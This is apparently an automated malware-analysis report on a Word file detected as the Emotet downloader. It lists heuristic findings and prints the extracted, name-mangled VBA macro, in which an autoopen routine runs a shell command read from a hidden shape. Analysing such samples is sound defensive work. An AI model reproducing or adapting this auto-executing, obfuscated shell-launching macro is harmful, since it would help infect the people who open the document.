MALICIOUS
252
Risk Score
Heuristics 9
-
ClamAV: Doc.Downloader.Emotet-6899225-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Downloader.Emotet-6899225-0
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Potential Shell call in VBA critical OLE_VBA_SHELLPotential Shell call in VBAMatched line in script
_ .Shell(iihfU, jChzFM), YXtwPRj) zISRQFrULdSlRZslbHilSOH = (242593722 + Round(JQShbkjFrQbBbDLOHUzGfIij) * 293021783 - wzNckBhRGpZmksijaIRjzE + (WLtHiUAhmpmlmrPjaU / Tan(zWpVkGXwiZOJouar))) -
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
AutoOpen macro low OLE_VBA_AUTOOPENAutoOpen macroMatched line in script
Attribute VB_Customizable = True Sub autoopen() shdSmRDc -
Suspicious cmd.exe invocation with execution flag high SC_STR_CMDSuspicious cmd.exe invocation with execution flag
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 4597 bytes |
SHA-256: 265c9cf6c22a1e817af8fb92d806ed1d2511ba9fd43d6a92fe07a15d49daa20c |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
131 of 160 identifiers look randomly generated (e.g. 'jkpfXDfWtbhToiVjAlXpVfYZ') — consistent with name-mangling obfuscation.
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "vTqErLCw" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Sub autoopen() shdSmRDc End Sub Attribute VB_Name = "HCHMtlFZj" Function shdSmRDc() On Error Resume Next AwiaUizEQnGwuztfOmAWk = (205715811 + Round(YiUHYCTXluwdrGnN) * 155653977 - ZzunzzRvzVKSqAVlKr + (WbCzPVDwUCYbYdBKfQklXpcC / Tan(MSDvHFwwOAuXCiSuzztbtlpp))) qVZGchwzzDCzCMwcfKcGmd = 250163150 EbnPRFYTtcAzfjwIkt = (191263656 + Round(TchIDOBwpiAsqJAIAz) * 147476688 - qukbcbOitdSdwRDbtfLCDZd + (cIHWinIkXmiZsFfb / Tan(XFMPXvZGYPVoUn))) QZzUUsvFUiGKmijnz = 236723661 LOaKBwbGlcpzQfC = (28994865 + Round(PahdfAHzrIzpkt) * 166389160 - DXonYFSciduFcI + (uqMqOqffOSLKncQ / Tan(jQwMHNRbJIEuBF))) WiCEzXDKMYsaVN = 312670286 nDwbiEnzHzHzcwGcfwi = (336938489 + Round(SiAjasQTTcNpBaRRFsD) * 71886539 - UwqJBYPzJKSIwUUzvDMXjoWt + (aVoLaGioiwmJXYTA / Tan(JRvjDFzTKornQjazzb))) anjEnUUWioYfsX = 78080880 iriKFtWvwYscwcbjW = (322803382 + Round(FJGwPwnhMnYVPi) * 170113639 - zcKXmjwTkwDCobYNEJ + (FXuPLSLKIaCcwWIiELZ / Tan(WLnMSuktkOKRGCUzC))) wEaYpshUFjfzTCir = 35725263 zSPASNXHPvYhHOfzGjrS = (7228865 + Round(MRvRHZSAMDIOThENCqpz) * 234944177 - NISwJRdVUWdVFwF + (FwpPiVZsuwvsdA / Tan(BuHEmwJPAXqilkwbGHBl))) JUXsiZELVksTsbbwtSCwjp = 289355865 ZNobvoUzQrksPJnLDU = (212195589 + Round(SJuNZNGYuhbZCdaRGfroRj) * 118303093 - STJLdVlJMNBPSaCihvDiQLp + (jVFXcsZjrzuGDuvYwSMpbK / Tan(fdJGVfjiHdXcIPOjUoSXTfvi))) AimwwAKYWZtTlDDIVncfSm = 59078559 Set zdXQr = vTqErLCw.Shapes(flIwQE + "GFtELIoGcL" + VzVDm) iwnjQwpzHvwRjXMD = (225928437 + Round(tiSSlVLCwdYizRv) * 311475531 - fqMmmkZKcwMZhCCZ + (vvtPLSVNBMZZwhWoMjM / Tan(WGwtHIYwdObWIYVzBv))) XrYkXAljPplVWpEEpw = 1816059 ZGTWHmbkNtujWM = (21398115 + Round(UkduKJJXowCSFqsnvfiN) * 84010373 - uAqtIuDGaHGYzObPpQwv + (LkJfWAGlripSoqcERAOTh / Tan(uLhtiLfpNQQwjQjNlu))) VjYQFJXwKXPicAppzwdVuFBU = 167718962 Const jChzFM = 0 mupJWHcFOLlmSqXB = (260608324 + Round(nEidNUiJvnKBGqbDwZbCfqOH) * 307959119 - KAYqYKwIcWcJhViNMovNFuKO + (wZkTwqbiNJdkEPACzOFbosG / Tan(RiZMhuPqKwakNpfjAbT))) AcHZuLHjEmDGTMBR = 110697699 kNOrOatGsIQDwrAitWAbDM = (127372426 + Round(YqsXmBkpsfwfsSwEcrLhOjF) * 128568140 - oQmjnnYtUTXhVT + (XbLSuVlbawzMAlfplZUwkwI / Tan(sYlYzYWHXUKnXmY))) DpLkobXIodlIBVGZSGaWk = 82873495 XwtYDzCraoPYrdKMwAwWQlRE = (326469995 + Round(IzGtwPYqHkjjYicuHdjTPCpa) * 175837405 - bjflhobGqEkhsAABVafMbSt + (ioVdiGIjSBooKWDsIS / Tan(YJaliTNhPuOTIqJGtSzYkw))) OrMMrzXnDIiUMD = 18122610 WrNsNkooFuTvEREYRqahw = (323795048 + Round(iJqHjtQLVfwizqaDCz) * 204040167 - UmswCzzbXHDlZXiiXcHvpiw + (GiEiqnXiTCzvQrFjv / Tan(nNcMJcLsjZrjFlocrTsPlk))) USWXjRfXYzBvknuZcXwGw = 280417084 iihfU = zdXQr.TextFrame.TextRange + pWzRVn + iZaNY + tnaFpQ + XvTRBnN + zzfMph + ZARNCCk + MuRzfjKC + VznVV + oXdJmUPn dwtKtGIcbJKzHdYPC = (10106445 + Round(zraZJklDaFMrQiM) * 242092869 - QasaXstpTFNAviTPiPXCXkZ + (ChXORuOusfzcIia / Tan(jkpfXDfWtbhToiVjAlXpVfYZ))) SHPjrHEpZVmuujzCBVpMvGJ = 65188653 iKYhsXPDCNwsfQMAanKn = (102804067 + Round(aZwThRwQiUOcYLoOHA) * 335624877 - NXsHounXBNvIPJjwjZqzH + (iiiDrBLLfJofHDhrimdZOV / Tan(FMPcqfiKBcasOclDmLp))) lUjCjRsvDUhXJFYqbZVjz = 339000062 AtDVwmczJRKKkoFb = (319978975 + Round(AsvfOcjOJpfXFiaIXHHa) * 217294863 - zCAOiNLCzIKwuJQUfalkdm + (lLbjbQwUWwMvtfAuVC / Tan(rXNIoRsCbjowKKh))) CGdjmzonwhOWpfjPi = 153367847 UIPSDEaTruvEhWYGPazK = (90784784 + Round(EWXvBmWViwodAFcuwAju) * 331417452 - CfOOUwEOIXQpDsv + (CozVPwQEWTiVizi / Tan(jzUrjmSXQQqQMKBkwn))) rzcsFPJsAUjkLtzJGXDbQVZF = 335054692 RrzahVVjzIrdCtszJVmkj = (167165372 + Round(sIGAWUAFqNdiVAfjt) * 95481615 - HodwcMmGdshkCrZF + (aVwPzCAQYPWzilsVS / Tan(dOMinkOWNJcbmvvMJ))) PwKlcjDzQIzGoOjZvqG = 311681421 sLRuWqAmV = Array(EPcWu, DhjiWP, uMvMh, Interaction _ _ _ _ _ _ _ _ .Shell(iihfU, jChzFM), YXtwPRj) zISRQFrULdSlRZslbHilSOH = (242593722 + Round(JQShbkjFrQbBbDLOHUzGfIij) * 293021783 - wzNckBhRGpZmksijaIRjzE + (WLtHiUAhmpmlmrPjaU / Tan(zWpVkGXwiZOJouar))) qtCzFHnwzGwpKcrPq = 45135014 jEviACkNWMKNZVUFoYmUbCp = (7215191 + Round(GtmInffoAjudzRXUwdJFTUPk) * 25855011 - ijuSjPuitIwFjhfZZoZbqG + (zcZfvcliBEAwwuhAi / Tan(PYOVtucauvaLcvbUupGjw))) HizBikifrousbiA = 194752238 LRCAaXmpVNtkOrp = (208016152 + Round(qrNzHWtBfINpPdcGXIz) * 305202819 - ktaPsUjkYbaHVCNHHDuI + (uPZzGjQirjqltFwmjPCKRHjn / Tan(taPwPEFlhpdBQllTFhrkW))) zOUYnrwjnimRMIAjbfk = 339839145 End Function |
|||
Open this report in the interactive analyzer, or submit your own file for analysis.